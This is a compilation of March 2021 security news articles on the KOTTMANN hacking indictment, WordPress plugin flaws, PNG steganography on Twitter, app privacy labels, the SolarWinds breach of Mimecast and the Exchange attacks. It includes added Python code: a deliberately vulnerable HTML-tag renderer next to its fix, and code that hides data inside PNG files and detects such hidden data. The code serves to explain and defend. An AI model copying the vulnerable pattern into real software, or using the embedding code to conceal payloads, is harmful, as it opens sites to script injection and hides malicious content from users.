“KOTTMANN then published, or “leaked,” victim data obtained through the actors’ and others’ hacking conduct. The FBI recently seized a website domain operated by KOTTMANN and used by KOTTMANN’s group to publish hacked data.” continues the DoJ. “In order to recruit others, grow the scheme, and further promote the hacking activity and KOTTMANN’s own reputation in the hacking community, KOTTMANN actively communicated with journalists and over social media about computer intrusions and data theft.”
On March 12, 2021, Swiss authorities executed search warrants related to the criminal activity.
“Conspiracy to commit computer fraud and abuse is punishable by up to 5 years in prison. Wire fraud and conspiracy to commit wire fraud are punishable by up to 20 years in prison.” concludes the DoJ. “Aggravated identity theft is punishable by a mandatory minimum 24 months in prison to run consecutive to any sentence imposed on other counts of conviction.”
Millions of sites could be hacked due to flaws in popular WordPress plugins
20.3.2021 Hacking Securityaffairs
Experts found vulnerabilities in two WordPress plugins that could be exploited to run arbitrary code and potentially take over a website.
Security researchers disclosed vulnerabilities in Elementor and WP Super Cache WordPress plugins that could be exploited to run arbitrary code and take over a website under certain circumstances.
The flaws were uncovered in the Elementor and WP Super Cache plugins; the former is a website builder plugin with over seven million installs, while the latter has over 2 million installs.
Wordfence researchers discovered multiple stored cross-site scripting (XSS) flaws in the Elementor plugin, which collectively received a CVSS score of 6.4.
The lack of server-side validation for HTML tags in Elementor elements (i.e. Heading, Column, Accordion, Icon Box, and Image Box) allows any user to add executable JavaScript to a post or page via a crafted request.
“Many of these elements offer the option to set an HTML tag for the content within. For example, the “Heading” element can be set to use H1, H2, H3, etc. tags in order to apply different heading sizes via the header_size parameter.” reads the post published by Wordfence. “Unfortunately, for six of these elements, the HTML tags were not validated on the server side, so it was possible for any user able to access the Elementor editor, including contributors, to use this option to add executable JavaScript to a post or page via a crafted request.”
If an administrator reviewed a post containing malicious JavaScript, their high privileges could be abused to perform malicious actions such as creating a new administrator or adding a backdoor to the site.
“Since posts created by contributors are typically reviewed by editors or administrators before publishing, any JavaScript added to one of these posts would be executed in the reviewer’s browser,” continues Wordfence. “If an administrator reviewed a post containing malicious JavaScript, their authenticated session with high-level privileges could be used to create a new malicious administrator, or to add a backdoor to the site. An attack on this vulnerability could lead to site takeover.”
The flaws affect versions prior to 3.1.2; the plugin’s developers added an initial patch in version 3.1.2, and additional fixes were included in version 3.1.4.
The researcher m0ze from the Patchstack Red Team discovered an authenticated remote code execution (RCE) vulnerability in the WP Super Cache plugin that could be exploited by attackers to upload and execute malicious code, potentially resulting in site takeover.
The flaw affects plugin versions prior to 1.7.2.
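As an added illustration of the server-side check that Wordfence describes as missing (my own Python, not Elementor’s PHP code; apart from the header_size parameter named above, the function and constant names are hypothetical), the following shows a heading renderer that trusts the client-chosen tag beside one that allow-lists it on the server:

```python
"""Server-side allow-listing of a client-chosen HTML tag (added example)."""
import html

# Tags a heading element may legitimately render as; anything else is rejected.
ALLOWED_TAGS = frozenset({"h1", "h2", "h3", "h4", "h5", "h6", "div", "span", "p"})
DEFAULT_TAG = "h2"


def render_heading_vulnerable(header_size: str, title: str) -> str:
    """Trusts the client-supplied tag name: the flaw class described above.

    The title text is escaped, but the tag itself is interpolated unchecked, so
    a crafted request that picks a tag such as "script" turns the element into
    executable code for whoever previews the post in their browser.
    """
    return f"<{header_size}>{html.escape(title)}</{header_size}>"


def normalize_tag(header_size: str) -> str:
    """Return the tag if it is on the allow-list, otherwise the safe default.

    Comparing the whole string (not just a prefix) also rejects smuggled
    attributes such as 'h1 onclick=...', which a check on the leading letters
    alone would let through.
    """
    tag = header_size.strip().lower()
    return tag if tag in ALLOWED_TAGS else DEFAULT_TAG


def render_heading_fixed(header_size: str, title: str) -> str:
    """Same markup for legitimate input; hostile tag names collapse to DEFAULT_TAG."""
    tag = normalize_tag(header_size)
    return f"<{tag}>{html.escape(title)}</{tag}>"


if __name__ == "__main__":
    # Constructed inputs: one legitimate editor choice, one crafted request.
    for size in ("H3", "script", 'h1 onclick="x"'):
        print(repr(size), "->", render_heading_fixed(size, "Quarterly <results>"))
```

The fix is deliberately a closed allow-list rather than a deny-list of known-bad tags: the legitimate values are few and fixed, so anything outside them is rejected and the validation never needs to keep up with new ways of expressing a hostile tag.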
Security Researcher Hides ZIP, MP3 Files Inside PNG Files on Twitter
19.3.2021 Hacking Threatpost
The newly discovered steganography method could be exploited by threat actors to obscure nefarious activity inside photos hosted on the social-media platform.
A security researcher has discovered a novel steganography technique for hiding data inside a Portable Network Graphics (.PNG) image file posted on Twitter, a tactic that could be exploited by threat actors to hide malicious activity.
Researcher David Buchanan heralded his discovery on Twitter earlier this week, accompanied by a photo declaring: “Save this image and change the extension to .zip!”
He made the source code for his method available in a ZIP/PNG file attached to the image as well as on a post on GitHub that explains his methodology.
Specifically, Buchanan demonstrated how he could hide both MP3 audio files and ZIP archives within the PNG images hosted on Twitter. He succeeded because, while Twitter strips unnecessary data from PNG uploads, it does not remove trailing data from the DEFLATE stream inside the IDAT chunk if the overall image file meets the requirements to avoid being re-encoded, he explained.
Buchanan’s finding is important because threat actors have found digital steganography, or the art of hiding information inside media, a useful method especially for obscuring malicious files or other activity, including communication between command and control servers. If his method is successful, it can give attackers another way to hide in hosted images on a widely used social media platform.
The finding also comes on the heels of a discovery by researchers at website security firm Sucuri that Magecart attackers began hiding sensitive data they’ve skimmed from credit cards online inside .JPG files on a website they’ve injected with malicious code.
Certain Conditions
There are some requirements for both the images used to obscure files and the files being hidden inside them for his method to work, Buchanan explained.
“The cover image must compress well, such that the compressed filesize is less than (width * height) – size_of_embedded_file,” he wrote in his post. “If the cover image does not have a palette, then it must have at least 257 unique colors (otherwise Twitter will optimise it to use a palette).”
Image resolution can be up to 4096 x 4096, although Twitter will serve a downscaled version by default for images greater than 680 x 680 depending on certain factors, Buchanan wrote. The image also should not have any unnecessary “metadata chunks,” he added.
For embedded files, the total output file size must be less than potentially 5MB, but kept under 3MB to be on the safe side, otherwise Twitter will convert the PNG to a JPEG file, Buchanan explained.
Moreover, if the embedded file is a ZIP, then the offsets are automatically adjusted so that the overall file is still a valid ZIP, he said.
“For any other file formats, you’re on your own,” Buchanan added, noting that many will work without special parameters, including PDF and MP3 files.
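As an added example (my own Python, not Buchanan’s published script and not code from the Threatpost article), the block below builds a small constructed PNG, places data in the slack space after the zlib stream inside the IDAT chunk, which is the location the technique described above relies on, and then shows the check a defender can run on an incoming image: decompress the concatenated IDAT payload and count the bytes the decoder never consumed. It goes slightly beyond the article by also counting bytes appended after the IEND chunk, the other common hiding place that Twitter’s re-encoding would strip but a self-hosted upload service might not.

```python
"""Detecting data hidden after the zlib stream inside a PNG IDAT chunk (added example)."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte big-endian length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width: int, height: int, idat_slack: bytes = b"",
              post_iend: bytes = b"") -> bytes:
    """Build a minimal 8-bit RGB PNG (a constructed sample, not a real upload).

    idat_slack is placed inside the IDAT chunk *after* the zlib stream ends. The
    chunk length and CRC still cover it, so the file stays a valid PNG, but a
    decoder stops reading at the end of the zlib stream and never sees it.
    post_iend is appended after IEND, the classic "rename it to .zip" location.
    """
    scanline = b"\x00" + b"\x7f" * (width * 3)      # filter type 0, then RGB pixels
    raw = scanline * height
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2
    idat = zlib.compress(raw) + idat_slack
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + post_iend)


def parse_chunks(png: bytes):
    """Return ([(type, data), ...], offset just after IEND); verifies signature and CRCs."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        if pos + 12 + length > len(png):
            raise ValueError("truncated chunk")
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, pos


def find_slack(png: bytes) -> dict:
    """Count bytes in the file that a conforming PNG decoder would never read."""
    chunks, end = parse_chunks(png)
    # All IDAT chunks concatenated form a single zlib stream.
    idat = b"".join(data for ctype, data in chunks if ctype == b"IDAT")
    d = zlib.decompressobj()
    d.decompress(idat)
    return {
        "zlib_complete": d.eof,                  # False means a truncated or corrupt image
        "idat_trailing": len(d.unused_data) if d.eof else 0,
        "post_iend": len(png) - end,
    }


if __name__ == "__main__":
    payload = b"PK\x03\x04 constructed payload, not a real archive"
    for name, img in (("clean", build_png(16, 16)),
                      ("idat-slack", build_png(16, 16, idat_slack=payload))):
        print(name, find_slack(img))
```

A non-zero idat_trailing count is the signal to act on: an image that renders normally yet carries kilobytes the decoder never touches has no legitimate reason to, and an upload pipeline can either reject it or, as Twitter does for files outside Buchanan’s constraints, re-encode the pixels so the slack is discarded.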
Proof of Concept
While Threatpost did not download and follow Buchanan’s instructions for demonstrating the files, BleepingComputer did and reported the results.
The original 6KB image Buchanan tweeted with the declaration of his finding–once opened and its file format changed to ZIP–contained an entire ZIP archive with his source code that anyone can use to pack miscellaneous contents into a PNG image, according to the report.
Buchanan also posted another photo to Twitter that he asked people to download, renamed to .mp3 and open in the program VLC “for a surprise,” according to BleepingComputer.
Once converted to an MP3 file using Buchanan’s method and opened, the image would start playing the song “Never Gonna Give You Up” by Rick Astley, according to the report.
Buchanan posted yet another file to prove his point, an image of the Bard, William Shakespeare, which he said is a valid ZIP archive containing a multipart RAR archive with the complete works of Shakespeare embedded within.
The researcher said he tried to report the issue to Twitter’s bug bounty program, but was told that it’s not actually a bug. “Fair enough, but that just means we can have some fun with it,” Buchanan tweeted.
Google Reveals What Personal Data Chrome and Its Apps Collect On You
19.3.2021 Hacking Thehackernews
Privacy-focused search engine DuckDuckGo called out rival Google for "spying" on users after the search giant updated its flagship app to spell out the exact kinds of information it collects for personalization and marketing purposes.
"After months of stalling, Google finally revealed how much personal data they collect in Chrome and the Google app. No wonder they wanted to hide it," the company said in a tweet. "Spying on users has nothing to do with building a great web browser or search engine."
The "privacy nutrition labels" are part of a new policy that went into effect on December 8, 2020, mandating app developers to disclose their data collection practices and help users understand how their personal information is put to use.
The insinuation from DuckDuckGo comes as Google has been steadily adding app privacy labels to its iOS apps over the course of the last several weeks in accordance with Apple's App Store rules, but not before a three-month-long delay that caused most of its apps to go without being updated, lending credence to theories that the company had halted iOS app updates as a consequence of Apple's enforcement.
The "privacy label" changes are part of a series of privacy protections that Apple has been incorporating into its products and services in recent years, while simultaneously positioning itself as a more private and secure alternative to other platforms like Facebook and Google.
Starting with iOS 14, first- and third-party apps will not only have to tell users what information they amass but also get their permission to do it. The privacy labels aim to condense an app's data collection practices in an easy-to-understand and user-friendly format without going into great detail about what that data is being used for.
As Vox pointed out last month, the idea is to "strike a balance between giving the general user enough information to understand what an app is doing with their data, but not so much that the labels become as dense and complex as the privacy policies they're supposed to summarize."
But this can also mean that labels alone may not be a sufficient barometer for data collection, as users may have to read an app's privacy policy to really understand what goes on behind the scenes, not to mention completely rely on app developers to be truthful and transparent about what they do with the data.
For its part, Apple updated its privacy website last week with a new "Labels" section that highlights the privacy labels for all of Apple's apps together in one place, making it easier for users to learn about how Apple apps handle their personal data.
App Tracking Transparency Explained
An even bigger deal is an upcoming privacy update to iOS 14.5, which will also require apps to ask for users' consent before tracking them across other apps and websites using the device's advertising identifier (also called IDFA) as part of a new framework dubbed App Tracking Transparency (ATT).
The IDFA (or Identifier for Advertisers) — created by Apple in 2012 — has been traditionally used by companies and marketers to keep tabs on individuals between different apps in order to serve tailored ads and monitor how their ad campaigns performed.
For example, imagine scrolling through your Instagram feed, and you see an ad for a smartphone. You don't tap the ad, but instead, you go on Google, search for the same smartphone you saw on Instagram, and buy it.
Once this purchase is made, the retailer records the IDFA of the user who bought the phone and shares it with Facebook, which can then determine whether the ID corresponds to the user who saw an ad for the smartphone.
An analysis of app data collection practices by cloud storage company pCloud released earlier this month found that 52% of apps share user data with third-parties, with 80% of apps using the collected data to "market their own products in the app" and deliver ads on other platforms.
With the new changes, it's no longer possible for apps and third-party partners to accurately measure the effectiveness of their ads without asking explicit permission from users to opt in to being tracked using the identifier as they hop from one app to the other, a move that has riled up Facebook and others that sell mobile ads and heavily rely on this identifier to help target ads to users.
Put differently, while companies can still track users through their own services on a first-party basis, they cannot share that information with third-parties without users' permission.
In what could be a sign of things to come, an analysis by mobile advertising firm AppsFlyer found that after several third-party developers integrated Apple's ATT into their apps, 99% of users chose not to allow tracking.
"Technology does not need vast troves of personal data, stitched together across dozens of websites and apps, in order to succeed. Advertising existed and thrived for decades without it," Apple CEO Tim Cook explained the change in a January 28 speech at the Computers, Privacy and Data Protection (CPDP) conference. "If a business is built on misleading users, on data exploitation, on choices that are no choices at all, then it does not deserve our praise. It deserves reform."
The development comes as tech giants including Apple, Google, Amazon, and Facebook have come under heightened regulatory and privacy scrutiny in the U.S. and Europe for having amassed immense market power and for their collection of personal information, leading to the formation of new data protection laws aimed at safeguarding user privacy.
On Wednesday, France's competition regulator rejected calls from advertising companies and publishers to block ATT on antitrust grounds, stating that the privacy initiative "does not appear to reflect an abuse of a dominant position on the part of Apple," but added it would continue to investigate the changes to ensure that "Apple has not applied less restrictive rules" for its own apps, signaling how measures designed to protect user privacy can be at odds with regulating online competition.
It's worth noting that Google has separately announced plans to stop supporting third-party cookies in its Chrome browser by early 2022 while emphasizing that it would not build alternate identifiers or tools to track users across the web.
Advertisers Test New Tool to Circumvent ATT
But that hasn't stopped advertisers from trying workarounds to sidestep iOS privacy protections, setting them once again on a collision course with Apple.
According to the Financial Times, the Chinese Advertising Association (CAA) has developed an identifier called the China Anonymization ID (or CAID) that's aimed at bypassing the new Apple privacy rules and allow companies to continue tracking users without having to rely on IDFA.
"CAID has the characteristics of anonymity and decentralization, does not collect private data, only transmits the encrypted result, and the encrypted result is irreversible, which can effectively protect the privacy and data security of the end user; the decentralized design allows developers to be more flexible access to meet business needs," a Guangzhou-based ad-tech firm called TrackingIO explained in a now-removed write-up.
"Because CAID does not depend on Apple IDFA and can generate device identification ID independently of IDFA, it can be used as an alternative to device identification in iOS 14 and a supplementary solution when IDFA is not available," it added.
While CAID is yet to be formally implemented, the tool is said to be presently under testing by some of China's largest technology companies, including ByteDance and Tencent, with "several foreign advertising companies have already applied on behalf of their Chinese divisions," per the report.
It remains to be seen if Apple will green-light this proposal from the CAA, which is said to be "currently actively communicating" with the Cupertino-based company, with the report claiming that "Apple is aware of the tool and seems to have so far turned a blind eye to its use."
"The App Store terms and guidelines apply equally to all developers around the world, including Apple," the iPhone maker told FT. "We believe strongly that users should be asked for their permission before being tracked. Apps that are found to disregard the user's choice will be rejected."
Update
Following reports that companies are readying workarounds to skirt Apple's upcoming limits on ad tracking, the company is said to have sent cease and desist emails to two Chinese app developers who are testing CAID, a new anonymized identifier that's designed to track users even without access to IDFA, according to the Financial Times.
"We found that your app collects user and device information to create a unique identifier for the user's device," the email from Apple read, warning the developer to update the app to comply with App Store rules within 14 days or risk its removal from the App Store.
Besides CAID, other proposed solutions rely on a process called fingerprinting, which leverages device-specific information such as the IMEI number or a combination of the user's IP address and the type of browser and phone to create a unique identifier.
With apps devising numerous ways to slip through Apple's new requirements, it remains to be seen how the tech giant will enforce its anti-tracking policies once they go into effect later this spring.
Mimecast: SolarWinds Attackers Stole Source Code
18.3.2021 Hacking Threatpost
A new Mimecast update reveals the SolarWinds hackers accessed several “limited” source code repositories.
Hackers who compromised Mimecast networks as part of the SolarWinds espionage campaign have swiped some of the security firm’s source code repositories, according to an update by the company.
The email security firm initially reported that a certificate compromise in January was part of the sprawling SolarWinds supply-chain attack that also hit Microsoft, FireEye and several U.S. government agencies.
Attackers were found initially to have stolen a subset of Mimecast customers’ email addresses and other contact information, as well as certain hashed and salted credentials. However, in the most recent part of its investigation into the SolarWinds hack, Mimecast said it has found evidence that a “limited” number of source code repositories were also accessed.
However, the security vendor sought to downplay the impact of this access: “We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service,” it said in a Tuesday update. “We found no evidence that the threat actor made any modifications to our source code nor do we believe that there was any impact on our products.”
Update to Mimecast Investigation
In January, Microsoft discovered that attackers had compromised a Mimecast-owned certificate, used to authenticate Mimecast Sync and Recover (which provides backups for various mail content), Continuity Monitor (which monitors for email traffic disruptions), and Internal Email Protect (IEP) products to Microsoft 365 Exchange Web Services.
The threat actor used this certificate to connect to a “low single-digit number” of customers’ Microsoft 365 tenants from non-Mimecast IP address ranges. The attackers then leveraged Mimecast’s Windows environment to potentially extract customers’ encrypted service account credentials, hosted in the United States and the United Kingdom.
“These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes,” said Mimecast.
Initially, Mimecast had said there is no evidence that the threat actor accessed customers’ email or archive content – in its Tuesday update, the security firm reiterated this claim. However, the attackers’ access to source code could give them an inside look at various product components and other sensitive information. Further information about the type of source code accessed is not available other than Mimecast saying that the source code accessed by attackers was “incomplete;” Mimecast did not provide further information on the accessed source code when reached by Threatpost.
The company said it will continue to analyze and monitor its source code (by implementing additional security analysis measures across the source code tree) to protect against potential misuse. Since the start of the attack, Mimecast has issued a new certificate connection and advised affected customers to switch to that connection, and has removed and blocked the threat actor’s means of access to the company’s affected segment (its production grid environment).
SolarWinds Hack: Consequences Continue to Play Out
SolarWinds attackers also nabbed source code repositories from Microsoft. The Microsoft repositories contained code for: A small subset of Azure components including those related to service, security and identity; a small subset of Intune components; and a small subset of Exchange components.
Mimecast’s update is only the latest in the widescale SolarWinds hack. Texas-based SolarWinds was the primary victim of the now-infamous cyberattack believed to be the work of Russian state-sponsored actors. During the attack, adversaries leveraged SolarWinds’ Orion network management platform to infect users with a backdoor called “Sunburst,” which paved the way for lateral movement to other parts of networks.
This backdoor was initially pushed out via trojanized product updates to almost 18,000 organizations around the globe—including high-profile victims such as the U.S. Department of Homeland Security (DHS) and the Treasury and Commerce departments—starting last spring. Other cybersecurity vendors – like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys – have also been targeted as part of the attack.
Once embedded, the attackers were able to pick and choose which organizations to further penetrate.
Since then, several strains of malware have also been discovered, which were associated with the attackers behind the SolarWinds hack. The malware families include: A backdoor that’s called GoldMax; a dual-purpose malware called Sibot and a malware called GoldFinder. In addition to Sunburst, which is the malware used as the tip of the spear in the campaign, researchers in January unmasked additional pieces of malware,
SolarWinds hackers stole some of Mimecast source code
18.3.2021 Hacking Securityaffairs
Cybersecurity firm Mimecast confirmed that SolarWinds hackers who breached its network stole some of its source code.
Back in December, the SolarWinds supply chain attack made the headlines when a Russian cyber espionage group tampered with updates for SolarWinds’ Orion Network Management products that the IT company provides to government agencies, military, and intelligence offices.
Mimecast was one of the SolarWinds customers impacted by the attack: its systems were infected with the Sunburst backdoor distributed through tainted Orion software updates.
Now the company has admitted that hackers stole part of its source code from its repositories, but did not modify it.
Mimecast also added that the source code accessed by the hackers was incomplete and could not be used to build and run any component of the Mimecast service.
“Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information. The threat actor also accessed a subset of email addresses and other contact information, as well as encrypted and/or hashed and salted credentials. In addition, the threat actor accessed and downloaded a limited number of our source code repositories, but we found no evidence of any modifications to our source code nor do we believe there was any impact on our products.” reads the incident report published by Mimecast. “We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers.”
Mimecast states that only a few customers who used the stolen certificate were targeted by the threat actor, and that it has already notified them. The company urged customers hosted in the United States and United Kingdom to reset any server connection credentials in use on the Mimecast platform as a precautionary measure.
The company added that it is resetting the affected hashed and salted credentials as a precautionary step.
Below is the list of additional remediation measures implemented by the company in response to the security incident:
Rotated all impacted certificates and encryption keys.
Upgraded encryption algorithm strength for all stored credentials.
Implemented enhanced monitoring of all stored certificates and encryption keys.
Deployed additional host security monitoring functionality across all of our infrastructure.
Decommissioned SolarWinds Orion and replaced it with an alternative NetFlow monitoring system.
Rotated all Mimecast employee, system, and administrative credentials, and expanded hardware-based two-factor authentication for employee access to production systems.
Completely replaced all compromised servers.
Inspected and verified our build and automation systems to confirm that Mimecast-distributed executables were not tampered with.
Implemented additional static and security analysis across the source code tree.
You can find more details about the SolarWinds attack here.
Mimecast Says SolarWinds Hackers Stole Source Code
18.3.2021 Hacking Securityweek
Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack, and revealed that the threat actor managed to steal some source code.
Mimecast was one of the several cybersecurity companies to confirm being targeted by the hackers who breached the systems of IT management solutions provider SolarWinds.
After compromising SolarWinds systems, the attackers, who have been linked to Russia, used their access to deliver malicious updates for SolarWinds’ Orion monitoring product to roughly 18,000 customers. A few hundred of these customers, including government and private organizations, were further targeted.
One of these targets was Mimecast, which learned about the intrusion from Microsoft. The tech giant had noticed that a certificate used by Mimecast customers to authenticate certain products with Microsoft 365 services had been compromised.
The investigation, conducted with the aid of FireEye’s Mandiant incident response unit, revealed that the hackers gained access to part of Mimecast’s production environment using the SUNBURST malware delivered via malicious Orion product updates.
The threat actor then managed to move laterally within the compromised environment, gaining access to various types of systems and information.
The compromised certificate discovered by Microsoft was used by the attackers to connect to the Microsoft 365 tenants of a “low single-digit number” of customers.
In addition, the hackers obtained encrypted service account credentials created by customers in the US and UK. These credentials, which are used for connections between Mimecast tenants and on-premises and cloud services, do not appear to have been decrypted or misused.
“We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers,” Mimecast said in an incident report published on Tuesday.
However, the attackers did manage to gain access to a “subset” of email addresses and other contact information, as well as hashed and salted credentials. Impacted customers have been notified.
The investigation also showed that the attackers — similar to what they did in the case of other victims, including Microsoft — also accessed and downloaded “a limited number” of source code repositories.
“We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service. We found no evidence that the threat actor made any modifications to our source code nor do we believe that there was any impact on our products,” Mimecast said.
In response to the incident, the cybersecurity firm rotated all impacted encryption keys and certificates, stopped using the Orion product, changed all employee and system credentials, enhanced authentication security, completely replaced all hacked servers, and rolled out additional security monitoring systems.
Mimecast Finds SolarWinds Hackers Stole Some of Its Source Code
18.3.2021 Hacking Thehackernews
Email security firm Mimecast on Tuesday revealed that the state-sponsored SolarWinds hackers who broke into its internal network also downloaded source code out of a limited number of repositories.
"The threat actor did access a subset of email addresses and other contact information and hashed and salted credentials," the company said in a write-up detailing its investigation, adding the adversary "accessed and downloaded a limited number of our source code repositories, as the threat actor is reported to have done with other victims of the SolarWinds Orion supply chain attack."
But Mimecast said the source code downloaded by the attackers was incomplete and would be insufficient to build and run any aspect of the Mimecast service and that it did not find signs of any tampering made by the threat actor to the build process associated with the executables that are distributed to its customers.
On January 12, Mimecast disclosed that "a sophisticated threat actor" had compromised a digital certificate it provided to certain customers to securely connect its products to Microsoft 365 (M365) Exchange.
Weeks later, the company tied the incident to the SolarWinds mass exploitation campaign, noting that the threat actor accessed and possibly exfiltrated certain encrypted service account credentials created by customers hosted in the U.S. and the U.K.
Noting that the intrusion stemmed from the Sunburst backdoor deployed via trojanized SolarWinds Orion software updates, the company said it observed lateral movement from the initial access point to its production grid environment, which contains a small number of Windows servers, in a manner consistent with the attack pattern attributed to the threat actor.
Although the exact number of customers who used the stolen certificate remains unknown, the company said in January that "a low single digit number of our customers' M365 tenants were targeted."
Alleged to be of Russian origin, the threat actor behind the SolarWinds supply-chain attacks is being tracked under multiple names, including UNC2452 (FireEye), Dark Halo (Volexity), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Nobelium (Microsoft).
Mimecast, which had roped Mandiant to lead its incident response efforts, said it concluded the probe earlier this month.
As part of a slew of countermeasures, the company also noted that it fully replaced the compromised Windows servers, upgraded the encryption algorithm strength for all stored credentials, implemented enhanced monitoring of all stored certificates and encryption keys and that it had decommissioned SolarWinds Orion in favor of a NetFlow monitoring system.
SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers
10.3.2021 Hacking Thehackernews
A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group.
In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral.
Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems.
The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security, both of whom described Supernova as a .NET web shell implemented by modifying an "app_web_logoimagehandler.ashx.b6031896.dll" module of the SolarWinds Orion application.
The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn allowing a remote attacker to execute unauthenticated API commands.
"Unlike Solorigate [aka Sunburst], this malicious DLL does not have a digital signature, which suggests that this may be unrelated to the supply chain compromise," Microsoft had noted.
While the Sunburst campaign has since been formally linked to Russia, the origins of Supernova remained a mystery until now.
According to Secureworks Counter Threat Unit (CTU) researchers — who discovered the malware in November 2020 while responding to a hack in one of its customers' networks — "the immediate and targeted nature of the lateral movement suggests that Spiral had prior knowledge of the network."
During the course of further investigation, the firm said it found similarities between the incident and a prior intrusion on the same network uncovered in August 2020, which had been accomplished by exploiting a vulnerability in a product known as ManageEngine ServiceDesk as early as 2018.
"CTU researchers were initially unable to attribute the August activity to any known threat groups," the researchers said. "However, the following similarities to the Spiral intrusion in late 2020 suggest that the Spiral threat group was responsible for both intrusions."
The connection to China stems from the fact that attacks targeting ManageEngine servers have long been associated with threat groups located in the country, not to mention the modus operandi of exploiting long-term persistence to collect credentials, exfiltrate sensitive data, and plunder intellectual property.
But more solid evidence arrived in the form of an IP address that geolocated to China, which the researchers said came from a host that was used by the attackers to run Secureworks's endpoint detection and response (EDR) software for reasons best known to the threat actor, suggesting the software may have been stolen from the compromised customer.
"The threat group likely downloaded the endpoint agent installer from the network and executed it on the attacker-managed infrastructure," the researchers detailed. "The exposure of the IP address was likely unintentional, so its geolocation supports the hypothesis that the Spiral threat group operates out of China."
It's worth pointing out that SolarWinds addressed Supernova in an update to Orion Platform released on December 23, 2020.
Microsoft Exchange Hackers Also Breached European Banking Authority
10.3.2021 Hacking Thehackernews
The European Banking Authority (EBA) on Sunday said it had been a victim of a cyberattack targeting its Microsoft Exchange Servers, forcing it to temporarily take its email systems offline as a precautionary measure.
"As the vulnerability is related to the EBA's email servers, access to personal data through emails held on those servers may have been obtained by the attacker," the Paris-based regulatory agency said.
EBA said it has launched a full investigation into the incident in partnership with its information and communication technology (ICT) provider, a team of forensic experts, and other relevant entities.
In a second update issued on Monday, the agency said it had secured its email infrastructure and that it found no evidence of data extraction, adding it has "no indication to think that the breach has gone beyond our email servers."
Besides deploying extra security measures, EBA also noted it's closely monitoring the situation after restoring the full functionality of the email servers.
The development is a consequence of an ongoing widespread exploitation campaign by multiple threat actors targeting vulnerable Microsoft Exchange email servers a week after Microsoft rolled out emergency patches to address four security flaws that could be chained to bypass authentication and remotely execute malicious programs.
Microsoft is said to have learned of these vulnerabilities as early as January 5, 2021, indicating that the company had almost two months before it eventually pushed out a fix that shipped on March 2.
The Exchange Server mass hack has so far claimed at least 60,000 known victims globally, including a significant number of small businesses and local governments, with the attackers casting a wide net before filtering high-profile targets for further post-exploitation activity.
The rapidly accelerating intrusions, which also come three months after the SolarWinds hacking campaign, has been primarily attributed to a group called Hafnium, which Microsoft says is a state-sponsored group operating out of China.
Since then, intelligence gathered from multiple sources points to an increase in anomalous web shell activity targeting Exchange servers by at least five different threat clusters toward the end of February, a fact that may have played an important role in Microsoft releasing the fixes a week ahead of the Patch Tuesday schedule.
Indeed, according to the vulnerability disclosure timeline shared by Taiwanese cybersecurity firm Devcore, Microsoft's Security Response Center (MSRC) is said to have originally planned the patch for March 9, which coincides with the Patch Tuesday for this month.
If the commoditization of the ProxyLogon vulnerabilities doesn't come as a surprise, the swift and indiscriminate exploitation by a multitude of cybercrime gangs and nation-state hackers alike surely is, implying that the flaws were relatively easy to spot and exploit.
Stating that the Chinese Exchange server hacks are a major norms violation, Dmitri Alperovitch, chairman of the Silverado Policy Accelerator and co-founder of CrowdStrike, said "while it started out as targeted espionage campaign, they engaged in reckless and dangerous behavior by scanning/compromising Exchange servers across the entire IPv4 address space with web shells that can now be used by other actors, including ransomware crews."
Hackers compromised Microsoft Exchange servers at the EU Banking Regulator EBA
9.3.2021 Hacking Securityaffairs
The European Banking Authority (EBA) disclosed a cyberattack that resulted in the hack of its Microsoft Exchange email system.
The European Banking Authority announced that it was the victim of a cyber attack against its email system that exploited recently disclosed zero-day vulnerabilities in Microsoft Exchange.
On March 2nd, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.
The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to gain access to on-premises Exchange servers, read email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.
